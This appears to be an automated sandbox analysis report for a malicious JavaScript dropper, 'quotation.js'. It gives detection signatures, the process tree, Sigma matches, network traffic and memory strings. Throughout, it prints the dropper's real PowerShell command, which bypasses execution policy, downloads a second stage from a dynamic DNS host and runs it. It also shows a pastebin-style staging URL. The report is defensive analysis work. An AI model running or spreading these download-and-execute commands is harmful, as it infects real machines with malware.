Windows Analysis Report
quotation.js

Overview

General Information

Sample name: quotation.js
Analysis ID: 1502676
MD5: e9dfe55aca773878308f2d4d6ad00c79
SHA1: 0066ce882b680471050a49ec800d32e47b3765ca
SHA256: d7c6eab85f93123d8bf4db0f5714d2d400d4f7fb93b1a79163ebaee7e72b515d
Tags: js

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
System process connects to network (likely due to code injection or exploit)
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

  • System is w10x64
  • wscript.exe (PID: 712 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5428 cmdline: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' " MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7756 cmdline: cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • taskkill.exe (PID: 7772 cmdline: taskkill /f /im wscript.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Network Connection | Author: frack113, Florian Roth | Data: DestinationIp: 104.26.3.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 712, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", ProcessId: 712, ProcessName: wscript.exe
Source: Process started | Author: frack113 | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 104.26.3.16, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 712, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49702
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js", ProcessId: 712, ProcessName: wscript.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' ", ProcessId: 5428, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpP | Avira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/quotation.vbs.php | Avira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/Quo | Avira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org | Avira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C: | Avira URL Cloud: Label: malware
Source: http://timmy02.duckdns.org/uploads/186024/Quo | Virustotal: Detection: 5%
Source: unknown | HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: Binary string: \mscorlib.pdb[ | source: powershell.exe, 0000000A.00000002.1785333273.00000234C1C51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb | source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb | source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbviceG | source: powershell.exe, 0000000A.00000002.1784746433.00000234C1B8A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbon.resources] | source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Source: C:\Windows\System32\wscript.exe | Network Connect: 104.26.3.16 443
Source: unknown | DNS query: name: rentry.co
Source: unknown | DNS query: name: timmy02.duckdns.org
Source: Joe Sandbox View | IP Address: 104.26.3.16
Source: Joe Sandbox View | ASN Name: ALGTEL-ASDZ
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: GET /6yg2yfkf/raw HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Host: rentry.co
Source: global traffic | HTTP traffic detected: GET /uploads/186024/Quotation.vbs.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: timmy02.duckdns.org | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: rentry.co
Source: global traffic | DNS traffic detected: DNS query: timmy02.duckdns.org
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AA9D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC78000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://timmy02.duckdns.org
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AAC98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1767404550.00000234AAC66000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quo
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766480583.00000234A7CE7000.00000004.00000020.00020000.00000000.sdmp, quotation.js, tempScript.bat.1.dr | String found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php
Source: powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766381913.00000234A7BF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766329922.00000234A7BD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1766480583.00000234A7CE7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpCommonProgramFiles=C:
Source: wscript.exe, 00000001.00000002.1794047481.00000274B6A06000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.phpP
Source: powershell.exe, 0000000A.00000002.1766329922.00000234A7BD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://timmy02.duckdns.org/uploads/186024/quotation.vbs.php
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A96A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1767404550.00000234A98CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AA2CC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000A.00000002.1767404550.00000234AB056000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1781643384.00000234B9855000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/
Source: wscript.exe, wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1792296152.00000274B4088000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1792698347.00000274B4365000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1793961218.00000274B6943000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/6yg2yfkf/raw
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/6yg2yfkf/raw9
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co/6yg2yfkf/rawD6
Source: wscript.exe, 00000001.00000002.1792296152.00000274B3FF9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://rentry.co:443/6yg2yfkf/raw
Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702

System Summary

Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
Source: quotation.js | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal100.troj.expl.evad.winJS@11/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user~1\AppData\Local\Temp\tempScript.bat
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "wscript.exe")
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\quotation.js"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tempScript.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'http://timmy02.duckdns.org/uploads/186024/Quotation.vbs.php' -OutFile 'C:\Users\user~1\AppData\Local\Temp\Update.php' "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\Update.php"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /f /im wscript.exe
Source: C:\Windows\System32\wscript.exe | Sections loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, jscript.dll, iertutil.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mlang.dll, mpr.dll, scrrun.dll, winhttpcom.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, sspicli.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, gpapi.dll, windows.storage.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Sections loaded: cmdext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Windows\System32\taskkill.exe | Sections loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: quotation.js | Static file information: File size 3316916 > 1048576
Source: Binary string: \mscorlib.pdb[ source: powershell.exe, 0000000A.00000002.1785333273.00000234C1C51000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.1785472340.00000234C1D60000.00000004.00000020.00020000.00000000.sdmp
